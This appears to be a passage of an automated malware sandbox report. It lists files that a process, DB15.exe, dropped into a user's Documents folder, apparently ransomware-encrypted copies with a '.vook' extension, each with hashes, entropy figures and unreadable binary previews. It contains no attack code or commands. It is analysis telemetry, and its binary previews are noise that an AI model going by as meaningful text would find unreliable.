                                                                                                                                                                                                                                      Preview:UOOJJ...fU0....~a_]'..x.C<....c.Y..>.U]Ukr..|R=...?....~..8...;!...4Jz..*.Ke.....]Y!#.@....1...d!.&?.oC."1....0mw.......3...):a..=.J...._m..5....pv.@...u.H.Bj..M'.f...42}.lU.&`......;..q.....19.Q........V....c.\..Wjd.#6J.0Q.....5...l..B...A.....q..s.]..'z..._].z#...t..eJ..kwL....G..XfF7..6.7.q..ZM.]...y..W...t...=..|...P..-..fwa...+.I.\.F...,.:q@..:.....9.b....f?.N4.....\<..v.'...,A8...q].....b.c.d.."..1...x...M@...~....#....)........!.F.. .#..'N2jp.$..R..Y.e.lO.YZ.~.....6.u6...>15c..;.6.W......W...;IpV.._,.dm..:h2...i.....5....K.Q.b..?|..nc...j..........Y.eY....Ie........+..HZ.d..M;IE.x.......tR..*V.....'.%......a....;..........UGm...a.w<.}m..R../.B....*"cj.3x........J.K5....n.....z.82...#.n..+.l....]...(:.g.....#. .|W<lN}...?.:}sy+M%.....r$U..F.m.,...d.;.].%..06kce.G..u;..._...$}..~.JI..4.(.l"..A.Y'..{u................L.%r..^[!m...u.wi0..U~OJ.v..J...t...w.2....&.....|3.."}.Yj+.9.,g.....&...4.oP.ez;...=..WE.p.s..5..5.....N.~....TRP.S..p1"mH

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.855011494569558
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Avs1K+8TT+XesFCD6h+oLgj6YebrqnG8VZHjKL4slbppMrW1J5vBKew4hwiTkbD:oLT+X14vmmarC1jwMrW17cnUiD
                                                                                                                                                                                                                                      MD5:DC466D6B526CACDA854EA42BDF224428
                                                                                                                                                                                                                                      SHA1:E14ED7E18537327E8A46DDB4DEA4DD0D1B39E384
                                                                                                                                                                                                                                      SHA-256:808CBE24CAA24DD555813DD0AB8A8F47B12EEC02268487AE867904BF020E1479
                                                                                                                                                                                                                                      SHA-512:23FC095E0C14D96B40ECCE815F3C1E441007975095F09884F792844807F7DCFEAF7B9FA28B4C7E3D5B2180D50068A89CDAE9CD3CB51D97850CDB7964F417E367
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJ...fU0....~a_]'..x.C<....c.Y..>.U]Ukr..|R=...?....~..8...;!...4Jz..*.Ke.....]Y!#.@....1...d!.&?.oC."1....0mw.......3...):a..=.J...._m..5....pv.@...u.H.Bj..M'.f...42}.lU.&`......;..q.....19.Q........V....c.\..Wjd.#6J.0Q.....5...l..B...A.....q..s.]..'z..._].z#...t..eJ..kwL....G..XfF7..6.7.q..ZM.]...y..W...t...=..|...P..-..fwa...+.I.\.F...,.:q@..:.....9.b....f?.N4.....\<..v.'...,A8...q].....b.c.d.."..1...x...M@...~....#....)........!.F.. .#..'N2jp.$..R..Y.e.lO.YZ.~.....6.u6...>15c..;.6.W......W...;IpV.._,.dm..:h2...i.....5....K.Q.b..?|..nc...j..........Y.eY....Ie........+..HZ.d..M;IE.x.......tR..*V.....'.%......a....;..........UGm...a.w<.}m..R../.B....*"cj.3x........J.K5....n.....z.82...#.n..+.l....]...(:.g.....#. .|W<lN}...?.:}sy+M%.....r$U..F.m.,...d.;.].%..06kce.G..u;..._...$}..~.JI..4.(.l"..A.Y'..{u................L.%r..^[!m...u.wi0..U~OJ.v..J...t...w.2....&.....|3.."}.Yj+.9.,g.....&...4.oP.ez;...=..WE.p.s..5..5.....N.~....TRP.S..p1"mH

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH\NEBFQQYWPS.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.855948103649276
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:zSREhs0ZCBOGBjTKDFZzeYqMcicoLQJ8+1u0IR2VtXgx5iTkbD:mqs0+BjTKDLzeYqMtQJH4Sg+iD
                                                                                                                                                                                                                                      MD5:300BB7C36B1472D777EB18AD0057C93D
                                                                                                                                                                                                                                      SHA1:3FC90843C59D7C2BF356C5449F4193DC612E9AAB
                                                                                                                                                                                                                                      SHA-256:EFEBA8106EAE4A27C6F28CCF9267F9C5E5703A385A462F487DF3C211FEE2BEA3
                                                                                                                                                                                                                                      SHA-512:DEB60D8E4B77D69D4199E7E6C6CD2BD2CA38356275C2F93E4C1480090ED003FE3969711BA328457D2F6F48F624CE24E4DBCD58C2CF71D1DC00E166C262D95B0A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ9P.|y(P...xm8.m...RG]^.D.\......_#.Wb.j-6..tQ...W.[/.......yT.K...jd..2..l..@O..>.<I."..`4...N.......g....A..%..~...)a.....A..t0.y.J".+.>....h4%.E..2..SF<...)-G0...U..|....N.Y.`W.~`.Qqf.y..;.}..R3.i...O9.r?....sC!r|..N.!e...9F.$..<.. ..+.h;.@A~.@/:..Y?...T.....*................2.a...Km%....1..@G&E'..!..?-.S.7......Rr..A...w........_..1P..F..D.f.).[....T&.`m.........&H...f]..x/..O".Y.9.B..k.;...X.Z.1m...V...|L<.....^....0..Lw-7..S.....3.yo.:9.ELY-.E.S.......z.W.l.ZB.......+t..t...Ia.H.'#.B.Vb.r}..d!.zb./c...2...af+&.h...{....-.7..zO...q.PQ...#.....m..#...0..nO.i(r....O........xXH....q..1..}.X...8o...RV.)..p.....T..]5...).$t.M....:.@....;G...`.p.0../B.#r........h.Z2...J..F..CP....O...E.Yy4sf..W...Y.b.p2.t....'.@.?.2..'RG.......x.I.u.[bN....sr..9p.wZ.N).zqm;.<u.6...!.WA...t.*.0ev..V....F%...............ugh...c.X9...\i.C.@X..-.f..L....b..b....ZyIX{f.<......~.u......a...z...T..z..sA..B.:..Qh]-g.n...X$5.ff.p.'.\...4.c.y.(T...g..g[.RN..U.w...K..

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH\NEBFQQYWPS.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.855948103649276
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:zSREhs0ZCBOGBjTKDFZzeYqMcicoLQJ8+1u0IR2VtXgx5iTkbD:mqs0+BjTKDLzeYqMtQJH4Sg+iD
                                                                                                                                                                                                                                      MD5:300BB7C36B1472D777EB18AD0057C93D
                                                                                                                                                                                                                                      SHA1:3FC90843C59D7C2BF356C5449F4193DC612E9AAB
                                                                                                                                                                                                                                      SHA-256:EFEBA8106EAE4A27C6F28CCF9267F9C5E5703A385A462F487DF3C211FEE2BEA3
                                                                                                                                                                                                                                      SHA-512:DEB60D8E4B77D69D4199E7E6C6CD2BD2CA38356275C2F93E4C1480090ED003FE3969711BA328457D2F6F48F624CE24E4DBCD58C2CF71D1DC00E166C262D95B0A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ9P.|y(P...xm8.m...RG]^.D.\......_#.Wb.j-6..tQ...W.[/.......yT.K...jd..2..l..@O..>.<I."..`4...N.......g....A..%..~...)a.....A..t0.y.J".+.>....h4%.E..2..SF<...)-G0...U..|....N.Y.`W.~`.Qqf.y..;.}..R3.i...O9.r?....sC!r|..N.!e...9F.$..<.. ..+.h;.@A~.@/:..Y?...T.....*................2.a...Km%....1..@G&E'..!..?-.S.7......Rr..A...w........_..1P..F..D.f.).[....T&.`m.........&H...f]..x/..O".Y.9.B..k.;...X.Z.1m...V...|L<.....^....0..Lw-7..S.....3.yo.:9.ELY-.E.S.......z.W.l.ZB.......+t..t...Ia.H.'#.B.Vb.r}..d!.zb./c...2...af+&.h...{....-.7..zO...q.PQ...#.....m..#...0..nO.i(r....O........xXH....q..1..}.X...8o...RV.)..p.....T..]5...).$t.M....:.@....;G...`.p.0../B.#r........h.Z2...J..F..CP....O...E.Yy4sf..W...Y.b.p2.t....'.@.?.2..'RG.......x.I.u.[bN....sr..9p.wZ.N).zqm;.<u.6...!.WA...t.*.0ev..V....F%...............ugh...c.X9...\i.C.@X..-.f..L....b..b....ZyIX{f.<......~.u......a...z...T..z..sA..B.:..Qh]-g.n...X$5.ff.p.'.\...4.c.y.(T...g..g[.RN..U.w...K..

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH\PWCCAWLGRE.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.842412519436425
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:rrSkJteG2vwpfSTULRjMgMQMBdJ8VXKSVSa44i09OwObqg7A/TOXvLdkiTkbD:3kG3NSkR4gM/3J8VXKq744dEbqDT0Tdc
                                                                                                                                                                                                                                      MD5:9076FE69D2D15CE67A511F8102D16E04
                                                                                                                                                                                                                                      SHA1:C093FC789BB5EEF427FAD89BF551CE733BB8EF60
                                                                                                                                                                                                                                      SHA-256:962256204676B4CCDB2F2C5A862DCA365A882C68BE7EBCF15B952812EA03C369
                                                                                                                                                                                                                                      SHA-512:61D4C1A695313D29D47C29EFC085343AA42FDAE5CC21537469F14F27516D9E34AD960B8432926F6BD752B37BBFB206428C95E723A3D0FB3E78B8D424E33CA6B8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA(.Jo.9.F.8.......C....b-/..:.......Y.h0..o.-.f.6F...\@....>.^).u..i`8e.a...5t.+a.k)....g.[..5^.'.c..W,Z..._+..2....{.'h.0P+..4/]..M.tWJ./.......R.L.5q.....m....`N.q.!1C....@u+<j...Ikx^)xm......S./..U...-.....\.....wy|,....5.2..........-.......'.K..........+.N.'O.........~.......rT.......x.X <.*.\.B.........P=.=.8F...\.OoA..........a.9)........Q...y...it.[.73:y.K....\....Y..b...&...^F.|...DR..1...s.|..=.. .D.E..z..N.d.....X...f..J%.l.4.z.......W..T#..[....X.f.b.T`.[...O....9.@...G....$`.<..!..~...;,D...u..;..v...F.}...........e...........S...|..{8...qc..O.."..M.\n...9X..4.."/oS.g.32..o.D......\eZS..ji...xF@...%3 K....5[4.F...s.......W/..4..e.$Q8.]....".H.........c.,.J...2..+.<,..5.......!...L....^........'...Kk..Z.......)./..."S.c..(.8.>].Yv..../....@ER..X......v......\x&.u.&..'{..>(..!....[.>.e.i)...l.+.r._.$.3.B.l.....)......}...........P...Q.j..]{i+..^8O.J...}.........i.xoM......f.r^.....na.[(...5W7.|`Z...\..tI.."

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH\PWCCAWLGRE.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.842412519436425
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:rrSkJteG2vwpfSTULRjMgMQMBdJ8VXKSVSa44i09OwObqg7A/TOXvLdkiTkbD:3kG3NSkR4gM/3J8VXKq744dEbqDT0Tdc
                                                                                                                                                                                                                                      MD5:9076FE69D2D15CE67A511F8102D16E04
                                                                                                                                                                                                                                      SHA1:C093FC789BB5EEF427FAD89BF551CE733BB8EF60
                                                                                                                                                                                                                                      SHA-256:962256204676B4CCDB2F2C5A862DCA365A882C68BE7EBCF15B952812EA03C369
                                                                                                                                                                                                                                      SHA-512:61D4C1A695313D29D47C29EFC085343AA42FDAE5CC21537469F14F27516D9E34AD960B8432926F6BD752B37BBFB206428C95E723A3D0FB3E78B8D424E33CA6B8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA(.Jo.9.F.8.......C....b-/..:.......Y.h0..o.-.f.6F...\@....>.^).u..i`8e.a...5t.+a.k)....g.[..5^.'.c..W,Z..._+..2....{.'h.0P+..4/]..M.tWJ./.......R.L.5q.....m....`N.q.!1C....@u+<j...Ikx^)xm......S./..U...-.....\.....wy|,....5.2..........-.......'.K..........+.N.'O.........~.......rT.......x.X <.*.\.B.........P=.=.8F...\.OoA..........a.9)........Q...y...it.[.73:y.K....\....Y..b...&...^F.|...DR..1...s.|..=.. .D.E..z..N.d.....X...f..J%.l.4.z.......W..T#..[....X.f.b.T`.[...O....9.@...G....$`.<..!..~...;,D...u..;..v...F.}...........e...........S...|..{8...qc..O.."..M.\n...9X..4.."/oS.g.32..o.D......\eZS..ji...xF@...%3 K....5[4.F...s.......W/..4..e.$Q8.]....".H.........c.,.J...2..+.<,..5.......!...L....^........'...Kk..Z.......)./..."S.c..(.8.>].Yv..../....@ER..X......v......\x&.u.&..'{..>(..!....[.>.e.i)...l.+.r._.$.3.B.l.....)......}...........P...Q.j..]{i+..^8O.J...}.........i.xoM......f.r^.....na.[(...5W7.|`Z...\..tI.."

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH\QNCYCDFIJJ.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.863444967276176
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:iZgGGGN3egqxiFPlhQedF+ab06amxy8mrPyLG4hBJWwjkxUi7piTkbD:iZPZwxcPHQedFS6CqLLJkxULiD
                                                                                                                                                                                                                                      MD5:83A58DFB9C4BF85747738D93273C697E
                                                                                                                                                                                                                                      SHA1:56F55E9941FCC234FA2D0B2C0A4148FBC41BF18D
                                                                                                                                                                                                                                      SHA-256:457EA5A2259802E74EA56C059F8E911DC397128C56E130CBA6DF5E19F2FEC5C5
                                                                                                                                                                                                                                      SHA-512:572BF78572FF4DB14F1D67C71A05238B0ACCD23C1405F7D22B21D36930381E4C269E72B60E3FD92DF11F63D868547F285361E442392FAF323A8C2ACCF3BE95C8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:QNCYCD....p.+...&...C.W'P..U.A........../..,F..4,9`.5.k...w..GCy...........G...........4.........5u....q.s"..X.Z0......m.6.H.m..L.....7p....#1..YXk4...."/...D.}...7.0..+..j%b...;A=.$.<.MZn..D..d.y..;..1xPf..u.........2...R*$Z..w&b..\F.i#..5He.....:.U.q7.]..$^._3|.~.....o..D.. A..J..D24.dMo..&$...A....b...(..*U.).*.......l......:..p...&...(.n}w.].A........s.............o... .TL..3h(1..*>./Sb(......2.l.H.......B....T.."...Y6...Y........Pjb...S7~...q...3..p.%.cD.l.[:....E.._....l...E..o./.[.NA..(....t.#pd...].t-|..;b.K .b...+.....Mw...Hcg.r.I.Gn!o..F8..<.L....`..u.aX....`$iwn.......p.......Q0...v/......J.omj.n.H.w<.........7.......m..@._d.m.msTX.8.E..i. .lj.H..$#6.^.n./....EX.6.=A...Jpcw$[.......FW.7.......(,........2.O..Cz...,..5.......7Z...:..\..... c......D...t/..9..`<.Q..u.O.....n..}.;......uJ.Z+9...v5.:..M. . .v.._~x+#L....'.....u..(i.G....[..HQ#...q.h{.dC....1...)...E......N......>.O.}y/Nl..E...\Y.T....(..-p.d....alst72Rz.....@.s...

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH\QNCYCDFIJJ.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.863444967276176
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:iZgGGGN3egqxiFPlhQedF+ab06amxy8mrPyLG4hBJWwjkxUi7piTkbD:iZPZwxcPHQedFS6CqLLJkxULiD
                                                                                                                                                                                                                                      MD5:83A58DFB9C4BF85747738D93273C697E
                                                                                                                                                                                                                                      SHA1:56F55E9941FCC234FA2D0B2C0A4148FBC41BF18D
                                                                                                                                                                                                                                      SHA-256:457EA5A2259802E74EA56C059F8E911DC397128C56E130CBA6DF5E19F2FEC5C5
                                                                                                                                                                                                                                      SHA-512:572BF78572FF4DB14F1D67C71A05238B0ACCD23C1405F7D22B21D36930381E4C269E72B60E3FD92DF11F63D868547F285361E442392FAF323A8C2ACCF3BE95C8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:QNCYCD....p.+...&...C.W'P..U.A........../..,F..4,9`.5.k...w..GCy...........G...........4.........5u....q.s"..X.Z0......m.6.H.m..L.....7p....#1..YXk4...."/...D.}...7.0..+..j%b...;A=.$.<.MZn..D..d.y..;..1xPf..u.........2...R*$Z..w&b..\F.i#..5He.....:.U.q7.]..$^._3|.~.....o..D.. A..J..D24.dMo..&$...A....b...(..*U.).*.......l......:..p...&...(.n}w.].A........s.............o... .TL..3h(1..*>./Sb(......2.l.H.......B....T.."...Y6...Y........Pjb...S7~...q...3..p.%.cD.l.[:....E.._....l...E..o./.[.NA..(....t.#pd...].t-|..;b.K .b...+.....Mw...Hcg.r.I.Gn!o..F8..<.L....`..u.aX....`$iwn.......p.......Q0...v/......J.omj.n.H.w<.........7.......m..@._d.m.msTX.8.E..i. .lj.H..$#6.^.n./....EX.6.=A...Jpcw$[.......FW.7.......(,........2.O..Cz...,..5.......7Z...:..\..... c......D...t/..9..`<.Q..u.O.....n..}.;......uJ.Z+9...v5.:..M. . .v.._~x+#L....'.....u..(i.G....[..HQ#...q.h{.dC....1...)...E......N......>.O.}y/Nl..E...\Y.T....(..-p.d....alst72Rz.....@.s...

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH\SFPUSAFIOL.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.852917977697565
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:+IgSzd5zzy09Klziry81fn7xs9eoBOpCiV04oR5Vxjmu2V++AIO5ei/iTkbD:XeioG1f9qbBOHVvodxjmSGOw5iD
                                                                                                                                                                                                                                      MD5:D03976264EB6EA137D4EB7248769B3DC
                                                                                                                                                                                                                                      SHA1:F5E5133C92AA3805E8AD93EB9E1B229AA0C01C11
                                                                                                                                                                                                                                      SHA-256:CA7D4ABB10E1C484C9A7C42ADB96C8516EAFC0E2CE8070D2D26D70E7575A4C83
                                                                                                                                                                                                                                      SHA-512:35A579B2CC1150A2F250D634DBF1C29051E1D0CD3730232826F0B7262FFD129C300B649E7399FC8F9718405F9563FF9EA940F0C73099DB1FD601C0AE84DF01B3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS..(LE0.!....,O[.<.Q.....b.BqW\..Q.R.......T..p..}..;.T..?.eo..p....#.OL..Z|.U.`.h.%....7|?.d....g..-x..Y.E..>^e..D.f..%a.....S.p.y...+.K........./`..N.I.kI....<.)..X....j.....h.NHq.O....U|..dA..T.....*I...LB."..[>.:......Lx.)...b8=c);....3...o\.KL..6...ZcB/.{.F....~..}..m........|..'MB.]..-....m.S....Bd4Z3.@.i...+w.W..........M..9...l=.......M..Oq.y"@..S.0TB~l<..=....5......[m#u...g../.@7..`...G..tS...}....~..0..P.H5.....;^.c........N.Z..I=.W.'..s2............._.vB.4(O..R.=...aF.C.......#v..j.)..Mt3@.M..........^.....;........Qg....uQ..D.7.!........+m..r'..q..<).ed.....vh.`...u...$........qO.-a..m..j<}....<......X.....L.g..B..H.t_.........V$..Xm...S......'.....I......7.E...O1.~....O.5....C......+...][.a. z.6S.>I.\..`u..x......s.* ...D.BZS...~...#BHh+..i. ...M.NK.vV...*^..TD]....i..~a0.!H...]..t].....).AB...h......(.I..]].\..`w..-..'e........P....A....TK.UKs...3.0X..:..xL|..kga0b]........<._4k+{...E.ep..d.R/.+..srQ...

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH\SFPUSAFIOL.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.852917977697565
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:+IgSzd5zzy09Klziry81fn7xs9eoBOpCiV04oR5Vxjmu2V++AIO5ei/iTkbD:XeioG1f9qbBOHVvodxjmSGOw5iD
                                                                                                                                                                                                                                      MD5:D03976264EB6EA137D4EB7248769B3DC
                                                                                                                                                                                                                                      SHA1:F5E5133C92AA3805E8AD93EB9E1B229AA0C01C11
                                                                                                                                                                                                                                      SHA-256:CA7D4ABB10E1C484C9A7C42ADB96C8516EAFC0E2CE8070D2D26D70E7575A4C83
                                                                                                                                                                                                                                      SHA-512:35A579B2CC1150A2F250D634DBF1C29051E1D0CD3730232826F0B7262FFD129C300B649E7399FC8F9718405F9563FF9EA940F0C73099DB1FD601C0AE84DF01B3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS..(LE0.!....,O[.<.Q.....b.BqW\..Q.R.......T..p..}..;.T..?.eo..p....#.OL..Z|.U.`.h.%....7|?.d....g..-x..Y.E..>^e..D.f..%a.....S.p.y...+.K........./`..N.I.kI....<.)..X....j.....h.NHq.O....U|..dA..T.....*I...LB."..[>.:......Lx.)...b8=c);....3...o\.KL..6...ZcB/.{.F....~..}..m........|..'MB.]..-....m.S....Bd4Z3.@.i...+w.W..........M..9...l=.......M..Oq.y"@..S.0TB~l<..=....5......[m#u...g../.@7..`...G..tS...}....~..0..P.H5.....;^.c........N.Z..I=.W.'..s2............._.vB.4(O..R.=...aF.C.......#v..j.)..Mt3@.M..........^.....;........Qg....uQ..D.7.!........+m..r'..q..<).ed.....vh.`...u...$........qO.-a..m..j<}....<......X.....L.g..B..H.t_.........V$..Xm...S......'.....I......7.E...O1.~....O.5....C......+...][.a. z.6S.>I.\..`u..x......s.* ...D.BZS...~...#BHh+..i. ...M.NK.vV...*^..TD]....i..~a0.!H...]..t].....).AB...h......(.I..]].\..`w..-..'e........P....A....TK.UKs...3.0X..:..xL|..kga0b]........<._4k+{...E.ep..d.R/.+..srQ...

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH\UOOJJOZIRH.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.827088003035746
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Y5rHRP7FQ2lzhci9j6BDGD3S9PIW2Do3DUqEM8ZcA1YkAZfHO6+LJ42yGbu5I6uq:0xPW2FhcioDCwIDY+BZcfl/ULTyGyVuq
                                                                                                                                                                                                                                      MD5:243B5931A1DF38BBC1C30BE0639AC32F
                                                                                                                                                                                                                                      SHA1:AC19D153CAFC707204CD2D58CA37C424CF6CA7A8
                                                                                                                                                                                                                                      SHA-256:6EEFF43B814BE47A8B3ECBDE8FABE82D37DFEF28B1A0FE6AAD1662353887124F
                                                                                                                                                                                                                                      SHA-512:C7B6ECF58D236388AFFF184A0B3E575AD77957F3F708D798863D8193A51B3B86F76481F5D4208AE29E5E94151A3E290674D4FE7260BDB2B44AF721F84EA99A5D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJ...&....y...3.Y..y..$....DX...V n....2...E/5y..hE6...2l/..W.....fqK)....1<.q1....hck....7fO,..Hl...f..'..........hu..[..Q..0..?.Y.a...3......N.{..sFV.NPo..C.4........z.2..zM...............H.+g...-.TO~..*.......\]`. ..#b.....O.........M.I..'......aF.%.k.r....c7vG3.3l.)@.4..k.l.S.S.....G...EHa.R._(.*}3.>..I}5;e.%a..,..5......JJE.:.q.....=:Y....,.g..-.*.9:. *..L..S.F5h.......194d.Q..........\..3..'D..#..y....H..k.).........Z.M..j...@...WBhJU.5D.%..H......]>A,Q.@.&x3.y.......Q+.....*.!..d...~.L~.7%.l.!r.{X7h..]%.Y..@.....8..~..]..!...q.d.#.m....H..G.j.*..rR..r.......+'5.J.B...k......0..H>..Va.7...Yu.....6'.q..&...~.:.p.?.<.......G..n..'..w.Y....{W vO..]oc)g......6I.)..t..Z./.....M...y:......A@.z.d.......p.M.y&tg"+..v.@E,.Q.....#....x.$..-..hO..v...2...4e0>!...;......O.....Ynu3.0.r....?h..|w...5.BHV~*..Fh..(.q7.........\ktx..A.."..6..C.W}K......=TN3..u.....ou.(.<....[./.ox..b...u..#O5t.00.......;..ln.0..f`....{.7+.Q..;.....i..a%w/M.F.hU.

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH\UOOJJOZIRH.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.827088003035746
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Y5rHRP7FQ2lzhci9j6BDGD3S9PIW2Do3DUqEM8ZcA1YkAZfHO6+LJ42yGbu5I6uq:0xPW2FhcioDCwIDY+BZcfl/ULTyGyVuq
                                                                                                                                                                                                                                      MD5:243B5931A1DF38BBC1C30BE0639AC32F
                                                                                                                                                                                                                                      SHA1:AC19D153CAFC707204CD2D58CA37C424CF6CA7A8
                                                                                                                                                                                                                                      SHA-256:6EEFF43B814BE47A8B3ECBDE8FABE82D37DFEF28B1A0FE6AAD1662353887124F
                                                                                                                                                                                                                                      SHA-512:C7B6ECF58D236388AFFF184A0B3E575AD77957F3F708D798863D8193A51B3B86F76481F5D4208AE29E5E94151A3E290674D4FE7260BDB2B44AF721F84EA99A5D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJ...&....y...3.Y..y..$....DX...V n....2...E/5y..hE6...2l/..W.....fqK)....1<.q1....hck....7fO,..Hl...f..'..........hu..[..Q..0..?.Y.a...3......N.{..sFV.NPo..C.4........z.2..zM...............H.+g...-.TO~..*.......\]`. ..#b.....O.........M.I..'......aF.%.k.r....c7vG3.3l.)@.4..k.l.S.S.....G...EHa.R._(.*}3.>..I}5;e.%a..,..5......JJE.:.q.....=:Y....,.g..-.*.9:. *..L..S.F5h.......194d.Q..........\..3..'D..#..y....H..k.).........Z.M..j...@...WBhJU.5D.%..H......]>A,Q.@.&x3.y.......Q+.....*.!..d...~.L~.7%.l.!r.{X7h..]%.Y..@.....8..~..]..!...q.d.#.m....H..G.j.*..rR..r.......+'5.J.B...k......0..H>..Va.7...Yu.....6'.q..&...~.:.p.?.<.......G..n..'..w.Y....{W vO..]oc)g......6I.)..t..Z./.....M...y:......A@.z.d.......p.M.y&tg"+..v.@E,.Q.....#....x.$..-..hO..v...2...4e0>!...;......O.....Ynu3.0.r....?h..|w...5.BHV~*..Fh..(.q7.........\ktx..A.."..6..C.W}K......=TN3..u.....ou.(.<....[./.ox..b...u..#O5t.00.......;..ln.0..f`....{.7+.Q..;.....i..a%w/M.F.hU.

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH\ZQIXMVQGAH.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.861975303358261
